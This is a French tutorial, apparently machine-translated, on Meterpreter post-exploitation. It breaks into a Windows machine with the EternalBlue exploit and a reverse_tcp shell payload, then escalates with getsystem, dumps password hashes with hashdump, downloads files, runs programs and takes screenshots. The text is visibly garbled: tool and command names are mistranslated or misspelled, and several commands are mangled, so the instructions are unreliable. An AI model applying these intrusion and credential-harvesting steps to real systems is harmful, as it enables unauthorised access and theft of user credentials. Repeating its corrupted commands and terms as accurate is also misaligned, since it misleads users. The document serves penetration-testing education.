Post Exploitation avec Meterpreter

Post Exploitation avec Meterpreter
Ceci est une introduction au plugin METERPRERTRER PULAD WARDING dans Metasploit. Dans ce court didacticiel, nous discuterons de la façon de l'utiliser pour appliquer l'exploitation de la publication à un système Windows OS une fois que vous l'avez déjà violé en utilisant l'EternalBlue Exploit. Nous nous limiterons à accéder au système Windows et à l'explorer, et tout ce que nous allons faire se concentrera sur l'accès aux informations et aux informations d'identification des utilisateurs.

Introduction à Meterpreter

Meterpreter est une charge utile d'attaque dans le cadre Metasploit qui permet à l'agresseur de contrôler et de naviguer dans l'ordinateur de la victime via un shell de commande. Cela peut s'avérer être un outil très polyvalent en matière de test de pénétration. Il s'agit d'un outil post-exploitation basé sur l'injection de DLL en mémoire, ce qui signifie qu'il fait fonctionner la DLL injectée en créant un nouveau processus qui appelle le système à exécuter la DLL injectée. Il peut vous donner accès à un shell de commande invisible sur une machine victime, vous permettant d'exécuter des exécutables et des réseaux de profil.

Il a été écrit à l'origine pour Metasploit 2.x et est mis à niveau pour Metasploit 3.

Nous discuterons en détail des utilisations de Meterpreter, mais avant cela, ayons un mot sur les charges utiles en général

Que sont les charges utiles?

Les charges utiles dans Metasploit sont des modules, ce qui signifie qu'ils sont des extraits de codes dans Metasploit qui s'exécutent sur le système distant que nous cibler. Le module d'exploitation est envoyé en premier, qui installe le module de charge utile sur le système. Ensuite, la charge utile accorde l'accès à l'attaquant (restreint ou à part entière, dépend du contenu de la charge utile). Pour élaborer davantage sur le fonctionnement des charges utiles, nous devons discuter de ses types, qui sont 3 au total:

Simple

Ces charges utiles sont complètement autonomes, ce qui signifie que celles-ci peuvent être aussi basiques que les codes de porte-gardiens qui permettent à l'utilisateur de participer à un système cible.

Stagers

Les stagers sont des charges utiles qui rassemblent des applications dans le système cible et l'envoient à l'attaquant. Il établit le lien entre la victime à notre machine locale.

Étapes

Une fois que les stagers ont accès au système, ils téléchargent les modules des étapes. Les modules des étapes suppriment le capuchon de taille sur le mètre.

Des exemples d'étapes seraient un simple shell, shell iPwn iPWN, modules de mètre, injection VNC.

Vous pouvez déterminer le type de charge utile en comprenant son nom. Les charges utiles uniques sont généralement du format /

Exploitation avec METERPRERTER

Tout d'abord, démarrez la console MSF en tapant la commande de terminal suivante dans la fenêtre du terminal Kali.

$ sudo msfconsole

Nous utilisons Reverse_TCP comme Stageer et Meterpreter comme étage.

Nous commencerons par installer l'exploit du bleu éternel. SELECT (MS17_010_ETERNALBLUE) puis définissez Windows / X64 / MeterPreter / Reverse_TCP comme charge utile sélectionnée

Ensuite, configurez les paramètres d'exploit, puis exécutez l'exploit avec la commande Exploit:

$ Set Payload Windows / x64 / Meterpreter / Reverse_Tcp
$ Set Rhost 192.168.198.136
$ Exploit

Le EternalBlue Exploit a été activé avec succès.

Après l'exploitation

Nous accédons et manipulons le système déjà compromis pendant la post-exploitation.

Nous pouvons faire beaucoup de choses maintenant que nous avons accès au système, mais comme mentionné ci-dessus, nous devons rester concentrés principalement sur le téléchargement des informations et l'obtention des informations d'identification de l'utilisateur ici

Gestion du privilège d'accès:

Selon le module de charge utile et l'exploit que vous avez utilisé, vous pouvez être confronté à certaines restrictions d'accès qui paralyseront gravement vos capacités pour manœuvrer la machine de victime. Vous pouvez contourner ce problème avec l'escalade des privilèges en supprimant les mots de passe et en altérant les registres. Vous pouvez également augmenter les privilèges en utilisant le système Get System de MeterPreter.

$ GetSystem
$ getuid

Transfert de fichiers avec Meterpreter

Avec Meterpreter, vous pouvez télécharger un fichier à l'aide de la commande $ download-.

$ téléchargement / windows / system32 / pilotes / etc / hôtes

De même, vous pouvez également télécharger des informations sur la machine, en utilisant la commande $ upload-

Extraction des informations d'identification de l'utilisateur:

Utiliser le code Code Cidential_Collector pour extraire les informations des comptes d'utilisateurs, ou utilisez le module Hash Dump Post à un effet similaire.

Nous utiliserons le module de poste de vidage de hachage pour procéder à la récolte des informations d'identification. Tapez la commande MSF suivante.

$ Run Post / Windows / Gather / Hashdump

Comme nous pouvons le voir, nous avons obtenu les comptes Coen, Guest et Admin. Le hachage LM (Admin) et le hachage NTLM (invité) se rapportent aux mots de passe vides, tandis que le hachage Coen est un mot de passe que vous devrez casser. Vous pouvez le faire en utilisant un biscuit de mot de passe.

Automatiser le grattage du système

Il peut être fastidieux de recueillir des informations avec des instructions d'entrée individuelles que vous devez continuer à nourrir le shell de commande. Idéalement, vous pouvez automatiser quelque peu ce processus avec du vigne - script. Le script recueille des informations auprès de la victime et télécharge les données dans notre machine locale. On vous dit où la sortie est enregistrée, comme vous pouvez le voir dans la quatrième ligne d'en haut:

$ Run Wineum

Gardez à l'esprit que le chemin où la sortie vers chaque commande est stockée peut être différent de celui de l'affichage ici.

Permet de jouer un peu plus

Exécution de fichiers

Vous pouvez exécuter n'importe quel fichier sur le système en utilisant: exécuter -f . Cela comprend à la fois des fichiers et des programmes exécutables avec plusieurs fichiers de support. Par exemple, pour exécuter l'application de calculatrice intégrée dans le système d'exploitation Windows, tapez l'exécution -f calc.exe

Prendre des captures d'écran

Vous pouvez également capturer des captures d'écran du point de vue de l'utilisateur. Tapez simplement la capture d'écran dans le shell de commande du mètre, et vous obtiendrez une capture d'écran de l'écran sur le système.

$ Execute -f calc.exe
$ capture d'écran

Conclusion:

Cela a été une brève introduction au plugin Meterpreter dans le cadre Metasploit, ainsi qu'un court guide présentant ses utilisations les plus élémentaires. Nous avons appris ici comment nous pouvons violer un système de système d'exploitation Windows avec EternalBlue Exploit pour accéder, puis utiliser Meterpreter pour augmenter les privilèges, collecter des informations manuellement et par la commande Vineus-Automating. Nous avons également appris à exécuter des fichiers sur la machine victime.

Meterpreter peut servir de moyen appréciable de détection de vulnérabilité, bien qu'il s'agisse d'un conglomération d'outils de base dans le cadre de Metasploit.